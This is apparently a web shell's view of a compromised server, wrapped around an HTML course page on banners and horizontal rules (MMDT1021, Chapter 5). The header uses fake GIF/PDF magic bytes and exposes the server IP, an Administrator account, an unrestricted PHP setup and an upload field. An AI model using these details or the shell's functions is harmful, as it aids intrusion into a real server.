GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch5/examples/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>MMDT1021 Chapter 5 Notes - page 11</title> <link href="chapter5p11_files/style.css" rel="stylesheet" type="text/css"></head><body> <p class="pagetitle" align="center">MMDT1021 Chapter 5 Notes - page 11</p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%"><span class="sectiontitle">Using a Banner </span> <p>A banner is simply an image at the top of each page that helps to bring the individual pages together visually. </p> <ol> <li><a href="http://www.target.com/">Target</a>. </li> <li><a href="http://www.wcco.com/">WCCO TV</a>. </li> <li><a href="http://www.msn.com/">MSN</a>. </li> <li><a href="http://www.barnesandnoble.com/">Barnes and Noble</a>. </li> </ol> <p> </p></td> </tr> </tbody></table> <p class="sectiontitle">Adding Horizontal Rules</p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Standard horizontal rule</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code>Text before horizontal rule. <hr /> Text after horizontal rule.</code></td> <td width="50%">Text before horizontal rule. <hr> <p>Text after horizontal rule.</p></td> </tr> </tbody></table> <p></p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Specifying the width of a horizontal rule.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code>Text before horizontal rule.<br> <hr width = "50%" />Text after horizontal rule.</code></td> <td width="50%">Text before horizontal rule. <hr width="50%"> <p>Text after horizontal rule.</p></td> </tr> </tbody></table> <p></p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">The default position of a horizontal rule is centered.<br> You need to specify align="left" to move the rule to the left margin.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code>Text before horizontal rule.<br> <hr width = "50%" align="left" />Text after horizontal rule.</code></td> <td width="50%">Text before horizontal rule. <hr align="left" width="50%"> <p>Text after horizontal rule.</p></td> </tr> </tbody></table> <p></p> <table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750"> <tbody><tr> <td width="100%">Specify the size (height) of a horizontal rule.</td> </tr> </tbody></table> <table bgcolor="#ffffff" border="1" cellpadding="4" width="750"> <tbody><tr> <th width="50%">Code</th> <th width="50%">Result</th> </tr> <tr valign="top"> <td width="50%"><code>Text before horizontal rule.<br> <hr width = "50%" align="center" size="10" /><br> Text after horizontal rule.</code></td> <td width="50%">Text before horizontal rule. <hr align="center" size="10" width="50%"> <p>Text after horizontal rule.</p></td> </tr> </tbody></table> <p></p> </body></html>